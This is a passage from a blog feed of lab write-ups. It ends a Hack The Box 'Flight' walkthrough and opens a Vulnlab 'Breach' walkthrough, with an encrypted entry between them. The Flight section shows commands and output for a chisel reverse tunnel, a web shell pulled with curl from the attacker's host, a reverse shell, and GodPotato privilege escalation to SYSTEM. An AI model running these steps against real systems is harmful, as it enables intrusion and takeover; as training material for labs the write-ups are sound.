356.1606ms)</span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight chisel server --reverse -p 1338 -v</span><br><span class="line">2024/11/15 15:22:37 server: Reverse tunnelling enabled</span><br><span class="line">2024/11/15 15:22:37 server: Fingerprint qjzDZAxmyopYIyjjHepp/tGY+pmdLBP3tWafTwLDK3o=</span><br><span class="line">2024/11/15 15:22:37 server: Listening on http://0.0.0.0:1338</span><br><span class="line">2024/11/15 15:22:41 server: session#1: Handshaking with 10.129.228.120:51486...</span><br><span class="line">2024/11/15 15:22:45 server: session#1: Verifying configuration</span><br><span class="line">2024/11/15 15:22:46 server: session#1: Client version (1.9.1) differs from server version (1.10.1-0kali1)</span><br><span class="line">2024/11/15 15:22:46 server: session#1: tun: Created</span><br><span class="line">2024/11/15 15:22:46 server: session#1: tun: SSH connected</span><br><span class="line">2024/11/15 15:22:46 server: session#1: tun: proxy#R:8989=&gt;8000: Listening</span><br><span class="line">2024/11/15 15:22:46 server: session#1: tun: Bound proxies</span><br></pre></td></tr></table></figure></div><p>By using chisel i forwarded port 8000 to my local machin in port 8989, i got a web page</p><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/HTB/Flight/port-forward.png"                                     ></p><p>Since we can access this page so we can add a web shell page in <code>C:\inetpub\development</code> so we can access it from web page and <code>c.bum</code> has write permission on that folder.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">C:\inetpub\development&gt;dir</span><br><span class="line">dir</span><br><span class="line"> Volume in drive C has no label.</span><br><span class="line"> Volume Serial Number is 1DF4-493D</span><br><span class="line"></span><br><span class="line"> Directory of C:\inetpub\development</span><br><span class="line"></span><br><span class="line">11/15/2024  02:57 PM    &lt;DIR&gt;          .</span><br><span class="line">11/15/2024  02:57 PM    &lt;DIR&gt;          ..</span><br><span class="line">04/16/2018  01:23 PM             9,371 contact.html</span><br><span class="line">11/15/2024  02:57 PM    &lt;DIR&gt;          css</span><br><span class="line">11/15/2024  02:57 PM    &lt;DIR&gt;          fonts</span><br><span class="line">11/15/2024  02:57 PM    &lt;DIR&gt;          img</span><br><span class="line">04/16/2018  01:23 PM            45,949 index.html</span><br><span class="line">11/15/2024  02:57 PM    &lt;DIR&gt;          js</span><br><span class="line">               2 File(s)         55,320 bytes</span><br><span class="line">               6 Dir(s)   5,082,267,648 bytes free</span><br><span class="line"></span><br><span class="line">C:\inetpub\development&gt;curl 10.10.16.25:1337/cmd.aspx -o cmd.aspx</span><br><span class="line">curl 10.10.16.25:1337/cmd.aspx -o cmd.aspx</span><br><span class="line"><span class="meta prompt_">  % </span><span class="language-bash">Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</span></span><br><span class="line">                                 Dload  Upload   Total   Spent    Left  Speed</span><br><span class="line">100  1547  100  1547    0     0    847      0  0:00:01  0:00:01 --:--:--   847</span><br><span class="line"></span><br><span class="line">C:\inetpub\development&gt;</span><br></pre></td></tr></table></figure></div><p>After adding a nw web shell file in that i was able to access it from <code>localhost:8989</code> and can execute commands too, by entering a simple powershell reverse shell we were able to get a shell back as <code>iis apppool\defaultapppool</code><br><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/HTB/Flight/final-shell.png"                                     ></p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight nc -nvlp 1290</span><br><span class="line">Listening on 0.0.0.0 1290</span><br><span class="line">Connection received on 10.129.228.120 51529</span><br><span class="line"></span><br><span class="line">PS C:\windows\system32\inetsrv&gt; whoami</span><br><span class="line">iis apppool\defaultapppool</span><br><span class="line">PS C:\windows\system32\inetsrv&gt; </span><br></pre></td></tr></table></figure></div><p>After checking privileges we can see, we have SeImpersonatePrivilege, so we can use Godpotato to get <code>Administrator</code></p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">PS C:\windows\system32\inetsrv&gt; cd C:/</span><br><span class="line">PS C:\&gt; whoami /priv</span><br><span class="line"></span><br><span class="line">PRIVILEGES INFORMATION</span><br><span class="line">----------------------</span><br><span class="line"></span><br><span class="line">Privilege Name                Description                               State                                       </span><br><span class="line">============================= ========================================= ========                                    </span><br><span class="line">SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled</span><br><span class="line">SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled</span><br><span class="line">SeMachineAccountPrivilege     Add workstations to domain                Disabled</span><br><span class="line">SeAuditPrivilege              Generate security audits                  Disabled</span><br><span class="line">SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled </span><br><span class="line">SeImpersonatePrivilege        Impersonate a client after authentication Enabled </span><br><span class="line">SeCreateGlobalPrivilege       Create global objects                     Enabled </span><br><span class="line">SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled</span><br><span class="line">PS C:\&gt; </span><br></pre></td></tr></table></figure></div><h4 id="nt-authority-system"><a href="#nt-authority-system" class="headerlink" title="nt authority\system"></a>nt authority\system</h4><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">PS C:\Temp&gt; curl 10.10.16.25:1337/gp.exe -o gp.exe</span><br><span class="line">PS C:\Temp&gt; .\gp.exe -cmd whoami</span><br><span class="line">[*] CombaseModule: 0x140736534806528</span><br><span class="line">[*] DispatchTable: 0x140736537112640</span><br><span class="line">[*] UseProtseqFunction: 0x140736536489168</span><br><span class="line">[*] UseProtseqFunctionParamCount: 6</span><br><span class="line">[*] HookRPC</span><br><span class="line">[*] Start PipeServer</span><br><span class="line">[*] CreateNamedPipe \\.\pipe\a80f3938-115f-4bdf-ad5c-5029c767bb5a\pipe\epmapper</span><br><span class="line">[*] Trigger RPCSS</span><br><span class="line">[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046</span><br><span class="line">[*] DCOM obj IPID: 0000a002-049c-ffff-b4f4-9b89e2edcafa</span><br><span class="line">[*] DCOM obj OXID: 0x8f56ec562db99e0d</span><br><span class="line">[*] DCOM obj OID: 0xd926ad70010f2218</span><br><span class="line">[*] DCOM obj Flags: 0x281</span><br><span class="line">[*] DCOM obj PublicRefs: 0x0</span><br><span class="line">[*] Marshal Object bytes len: 100</span><br><span class="line">[*] UnMarshal Object</span><br><span class="line">[*] Pipe Connected!</span><br><span class="line">[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE</span><br><span class="line">[*] CurrentsImpersonationLevel: Impersonation</span><br><span class="line">[*] Start Search System Token</span><br><span class="line">[*] PID : 920 Token:0x732  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation</span><br><span class="line">[*] Find System Token : True</span><br><span class="line">[*] UnmarshalObject: 0x80070776</span><br><span class="line">[*] CurrentUser: NT AUTHORITY\SYSTEM</span><br><span class="line">[*] process start with pid 5908</span><br><span class="line">nt authority\system</span><br><span class="line">PS C:\Temp&gt; </span><br></pre></td></tr></table></figure></div><p>After uploading Godpotato and executing it we got <code>nt authority\system</code> and we completed our machine.</p>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Hack The Box" scheme="http://example.com/categories/Hack-The-Box/"/>
    
    
    <category term="Active Directory" scheme="http://example.com/tags/Active-Directory/"/>
    
    <category term="Hack The Box" scheme="http://example.com/tags/Hack-The-Box/"/>
    
    <category term="HTB" scheme="http://example.com/tags/HTB/"/>
    
    <category term="SMB" scheme="http://example.com/tags/SMB/"/>
    
  </entry>
  
  <entry>
    <title>Breach in the Cloud</title>
    <link href="http://example.com/2024/11/12/Breach%20in%20the%20Cloud%20-%20pwnedlabs/"/>
    <id>http://example.com/2024/11/12/Breach%20in%20the%20Cloud%20-%20pwnedlabs/</id>
    <published>2024-11-12T11:31:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">  <script id="hbeData" type="hbeData" data-hmacdigest="e62c7fb04257daafee88a8429f3197d96c1472dc628b9d5ce5135bc24e0aa006">6783af345ef75850a00aabeca0669d9ba235da8c1f815d262f5a2efacfffa2d411cc549ba365452e9b8fad97b7bd142c1fdb689868108c93b04b9c78c0190e72ed668002351d0ee2f4c4e060ceb9b6e9386818f7a673dd34065d29dda2ff1d2c103ddbc983058897653d8de9aa1f86c4066dc1653fd71f5f848cbbe226fcdcf707581207caa68a1a80825be0e1d60bd0942e327045be5ed83995d044a643dcd48c0524829d6ee8a7273cfb215912233f6137b3ef689a6e67b883cadf0ab4a625c006f598695b227ed4792ec294fbda6a71c037f8b207cbceb881a7683edf4beb9f7e42910b8247e0b691f9095a20c935caabe19b48e80ecb0500c6d6f214fca46c4e21178107a545ae7a4a03e19642d8bed921e809094f77dd8ef9c6c1bdfbfb2c45cc4e41b7464d4c45b207a25bea8febd6dd2b3d560ef02e0891bb099267aba98da9b5e96dccdf63dda016978a8c46f1024dede35cecc2a15693c202ce5a0cba38c524dfe63d83cab62580f5e33624550a579d870c7e8b51f41066c962e2bcf9e461378c9f9bc3e688066b4b6cc47ea3cc58294aa15973feee0694a122ef73a4d82228108725bcff869ba1abc98cfddbd075e4554624e7c6235898602e06020ed53a582e0fd34182b0f3ef73910afb2341975117f7ff64d54ce67d33cde7b16c5521e6b709a7cdd8ec664ac4a7862d28ce6bbcecdcaa6ab4fd1225676908a871618ad483a85db613917a2294117a53372fe57c29b9899bd630ef386f5005811e003e53f322db7de14af59ad5fe5ac9260ff664fdebc62b595d5633efcfa141f568e60a1806b6c631f16900bccf94c9c2638ffc271d68e1667899face94b96eb2317a70c77a0fcb1e949658193f994141d6cb61565c56e3c247726025c3fe5928bccb45cd3a1c65b6f9de93ae7622e6631bbfd7db34b342bdcf0bfc902a3ede98bf423405a108db11f95c8ff5d6045e28b40a924563a7b7f7cbf72453ebbc68d07e23bbd74fbe8dd276f2dc4644bb8eabe38bf809bd865368b02fbc4c046448994b0347f75a29b1f19aa2b6f4e5ace50905493f63170aea20e2ca4f1216d7d082dd214dd141e7581dfbd74cd63aea2ea38ea19aeaafe79fcc34bc1b73fc366a16cc617785d6827bba0429d0b4b643ea8cfb3dc9ebe14ca034bc37323bf7a952f1ad773f0a1b83dfb3c107e74ce40b4f3b67941817178dff9bfc5ea129bbf2e944fe86459de46e5a9e6177f07c24c441113a4a30a87220732750e35bd1c43b70201582f848102f85b11e66c160cce859ea76a34f4024b8d7ccb94cbb720c40efaf7035a5cd5f53fdd3b9eb4b46de582d098bef493c81b13d0d32a9d75a0df328f16a658015c1a6df07979485f36c08c0c727fc06f7ad9891fa1f6712eadf837fda5d65feadcffedb375b23992fd36c7a5fee80785469392bb162e5075058b35b7812a65d59f8c05ff00c13b0694ba1774b3a55a304c1853bbd0bd285dbf11b871877626c04c7ec6251c396a0c44a5432970b7a734e136fc33f8275d41e5ffcc1ef013abc060c487d25cc7d227d9cc82122dc2ae04f7af79fbe330d95f7558bc17980e335cdc4619d3f154d6548c323d51e9a091fec4fd1b792198397e95422f7339d4204e73fa29a1c7d1c983b77a0f53e0fcb7948396560bedee8b4b53f2e623b85721ffacdcbe7edfa93b680e07c8a6325b6301c65a39949707e58529a6f1e3aa92dc01a9e6f5cffaebe32000630a59e7d2e9a23eca377ea2e03bb7d442a446cc3579145e0889d79d385b344445b23b82e903a5c82e8722fc15a375ddb4077068aea0e110b63d5b08ac90959a600910a058a0a9dc8ac72f3e5795431fec486c981c93a1bcf9e7cbdcfbd92bdf0fb50b1c46874605ba87f5312b01622607e45c68b3a01509e6b3c15ca77f982f9cfd6024fd2a16a89dca11e7fa2df7338a901e682c0193c77b5a71353244f8735a80388ac9ad69972456d7bdd07039a2699b5</script>  <div class="hbe hbe-content">    <div class="hbe hbe-input hbe-input-default">      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">        <span class="hbe hbe-input-label-content hbe-input-label-content-default">Hey, password is required here.</span>      </label>    </div>  </div></div><link href="/css/hbe.style.css" rel="stylesheet" type="text/css"><script data-swup-reload-script type="module" src="/js/plugins/hbe.js"></script><script data-swup-reload-script type="module">import {initHBE} from "/js/plugins/hbe.js";  log.info(ensurePrefix("hexo-blog-encrypt: loaded."));    initHBE();</script>]]></content>
    
    
    <summary type="html">Here&#39;s something encrypted, password is required to continue reading.</summary>
    
    
    
    <category term="Pwnedlabs" scheme="http://example.com/categories/Pwnedlabs/"/>
    
    
    <category term="AWS" scheme="http://example.com/tags/AWS/"/>
    
    <category term="Cloud" scheme="http://example.com/tags/Cloud/"/>
    
    <category term="Pwnedlabs" scheme="http://example.com/tags/Pwnedlabs/"/>
    
    <category term="AWS-Cli" scheme="http://example.com/tags/AWS-Cli/"/>
    
  </entry>
  
  <entry>
    <title>Breach Vulnlab</title>
    <link href="http://example.com/2024/11/03/Breach-Vulnlab/"/>
    <id>http://example.com/2024/11/03/Breach-Vulnlab/</id>
    <published>2024-11-03T10:46:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><p>In this machine, we exploit guest access to upload NTLM stealing files, capturing valid user credentials and obtaining a hash for a user. We validate these credentials to gain access to the target system. During our exploration, we identify a kerberoastable user, allowing us access to MSSQL after creating a silver ticket. We then utilize the Potato exploit to escalate our privileges, ultimately gaining an admin shell.</p><h4 id="Scanning"><a href="#Scanning" class="headerlink" title="Scanning"></a>Scanning</h4><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line">➜  Breach nmap -v 10.10.125.188 -sCV        </span><br><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 04:54 EST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.125.188</span><br><span class="line">Host is up (0.25s latency).</span><br><span class="line">Not shown: 987 filtered tcp ports (no-response)</span><br><span class="line">PORT     STATE SERVICE       VERSION</span><br><span class="line">53/tcp   open  domain        Simple DNS Plus</span><br><span class="line">80/tcp   open  http          Microsoft IIS httpd 10.0</span><br><span class="line">|_http-server-header: Microsoft-IIS/10.0</span><br><span class="line">|_http-title: IIS Windows Server</span><br><span class="line">| http-methods: </span><br><span class="line">|   Supported Methods: OPTIONS TRACE GET HEAD POST</span><br><span class="line">|_  Potentially risky methods: TRACE</span><br><span class="line">88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server <span class="keyword">time</span>: 2024-11-03 09:55:14Z)</span><br><span class="line">135/tcp  open  msrpc         Microsoft Windows RPC</span><br><span class="line">139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)</span><br><span class="line">445/tcp  open  microsoft-ds?</span><br><span class="line">464/tcp  open  kpasswd5?</span><br><span class="line">593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp  open  tcpwrapped</span><br><span class="line">3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)</span><br><span class="line">3269/tcp open  tcpwrapped</span><br><span class="line">3389/tcp open  ms-wbt-server Microsoft Terminal Services</span><br><span class="line">| rdp-ntlm-info: </span><br><span class="line">|   Target_Name: BREACH</span><br><span class="line">|   NetBIOS_Domain_Name: BREACH</span><br><span class="line">|   NetBIOS_Computer_Name: BREACHDC</span><br><span class="line">|   DNS_Domain_Name: breach.vl</span><br><span class="line">|   DNS_Computer_Name: BREACHDC.breach.vl</span><br><span class="line">|   DNS_Tree_Name: breach.vl</span><br><span class="line">|   Product_Version: 10.0.20348</span><br><span class="line">|_  System_Time: 2024-11-03T09:55:29+00:00</span><br><span class="line">| ssl-cert: Subject: commonName=BREACHDC.breach.vl</span><br><span class="line">| Issuer: commonName=BREACHDC.breach.vl</span><br><span class="line">| Public Key <span class="built_in">type</span>: rsa</span><br><span class="line">| Public Key bits: 2048</span><br><span class="line">| Signature Algorithm: sha256WithRSAEncryption</span><br><span class="line">| Not valid before: 2024-11-02T09:54:15</span><br><span class="line">| Not valid after:  2025-05-04T09:54:15</span><br><span class="line">| MD5:   779a:2dfc:9c51:9add:a59a:0cd1:6882:4b29</span><br><span class="line">|_SHA-1: b75b:c165:8364:5b4a:d739:cdaa:d9f4:a0c5:3f10:e078</span><br><span class="line">|_ssl-<span class="built_in">date</span>: 2024-11-03T09:56:08+00:00; 0s from scanner <span class="keyword">time</span>.</span><br><span class="line">Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">| smb2-time: </span><br><span class="line">|   <span class="built_in">date</span>: 2024-11-03T09:55:30</span><br><span class="line">|_  start_date: N/A</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">|   3:1:1: </span><br><span class="line">|_    Message signing enabled and required</span><br><span class="line"></span><br><span class="line">NSE: Script Post-scanning.</span><br><span class="line">Initiating NSE at 04:56</span><br><span class="line">Completed NSE at 04:56, 0.00s elapsed</span><br><span class="line">Initiating NSE at 04:56</span><br><span class="line">Completed NSE at 04:56, 0.00s elapsed</span><br><span class="line">Initiating NSE at 04:56</span><br><span class="line">Completed NSE at 04:56, 0.00s elapsed</span><br><span class="line">Read data files from: /usr/share/nmap</span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 111.14 seconds</span><br><span class="line">           Raw packets sent: 1996 (87.800KB) | Rcvd: 39 (3.394KB)</span><br><span class="line">➜  Breach </span><br></pre></td></tr></table></figure></div><h4 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h4><p>Using <code>nxc</code>, I first checked for SMB shares with guest access:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">➜  Breach nxc smb 10.10.125.188 -u <span class="string">&#x27;guest&#x27;</span> -p <span class="string">&#x27;&#x27;</span> --shares</span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:</span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         [+] breach.vl\guest: </span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         [*] Enumerated shares</span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         Share           Permissions     Remark</span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         -----           -----------     ------</span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         ADMIN$                          Remote Admin</span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         C$                              Default share</span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         IPC$            READ            Remote IPC</span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         NETLOGON                        Logon server share </span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         share           READ,WRITE      </span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         SYSVOL                          Logon server share </span><br><span class="line">SMB         10.10.125.188   445    BREACHDC         Users           READ            </span><br><span class="line">➜  Breach </span><br></pre></td></tr></table></figure></div><p>Found that share<code>share</code> has Both read and write permissions for guest and <code>Users</code> share hash read access granted, potentially useful for exploring user profiles.</p><p>I accessed the <code>Users</code> and <code>share</code> share using smbclient:</p><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br></pre></td><td class="code"><pre><span class="line">➜ Breach smbclient \\\\10.10.125.188\\Users -U guest</span><br><span class="line">Password for [WORKGROUP\guest]:</span><br><span class="line">Try &quot;help&quot; to get a list of possible commands.</span><br><span class="line">smb: \&gt; ls</span><br><span class="line">  .                                  DR        0  Thu Feb 17 08:12:16 2022</span><br><span class="line">  ..                                DHS        0  Thu Feb 17 10:38:00 2022</span><br><span class="line">  Default                           DHR        0  Thu Feb 10 04:10:33 2022</span><br><span class="line">  desktop.ini                       AHS      174  Sat May  8 04:18:31 2021</span><br><span class="line">  Public                             DR        0  Tue Sep 14 23:08:59 2021</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2594389 blocks available</span><br><span class="line">smb: \&gt; cd Desktop</span><br><span class="line">cd \Desktop\: NT_STATUS_OBJECT_NAME_NOT_FOUND</span><br><span class="line">smb: \&gt; ls</span><br><span class="line">  .                                  DR        0  Thu Feb 17 08:12:16 2022</span><br><span class="line">  ..                                DHS        0  Thu Feb 17 10:38:00 2022</span><br><span class="line">  Default                           DHR        0  Thu Feb 10 04:10:33 2022</span><br><span class="line">  desktop.ini                       AHS      174  Sat May  8 04:18:31 2021</span><br><span class="line">  Public                             DR        0  Tue Sep 14 23:08:59 2021</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2594381 blocks available</span><br><span class="line">smb: \&gt; cd Default\</span><br><span class="line">lsmb: \Default\&gt; ls</span><br><span class="line">  .                                 DHR        0  Thu Feb 10 04:10:33 2022</span><br><span class="line">  ..                                 DR        0  Thu Feb 17 08:12:16 2022</span><br><span class="line">  AppData                            DH        0  Thu Aug 19 02:45:22 2021</span><br><span class="line">  Desktop                            DR        0  Thu Aug 19 02:24:36 2021</span><br><span class="line">  Documents                          DR        0  Wed Feb  9 19:59:34 2022</span><br><span class="line">  Downloads                          DR        0  Sat May  8 04:20:24 2021</span><br><span class="line">  Favorites                          DR        0  Sat May  8 04:20:24 2021</span><br><span class="line">  Links                              DR        0  Sat May  8 04:20:24 2021</span><br><span class="line">  Music                              DR        0  Sat May  8 04:20:24 2021</span><br><span class="line">  NTUSER.DAT                        AHn   524288  Thu Feb 17 10:38:01 2022</span><br><span class="line">  ntuser.ini                       AHSn       20  Thu Aug 19 02:45:22 2021</span><br><span class="line">  Pictures                           DR        0  Sat May  8 04:20:24 2021</span><br><span class="line">  Saved Games                        Dn        0  Sat May  8 04:20:24 2021</span><br><span class="line">  Videos                             DR        0  Sat May  8 04:20:24 2021</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2594368 blocks available</span><br><span class="line">smb: \Default\&gt; cd Desktop\</span><br><span class="line">smb: \Default\Desktop\&gt; ls</span><br><span class="line">  .                                  DR        0  Thu Aug 19 02:24:36 2021</span><br><span class="line">  ..                                DHR        0  Thu Feb 10 04:10:33 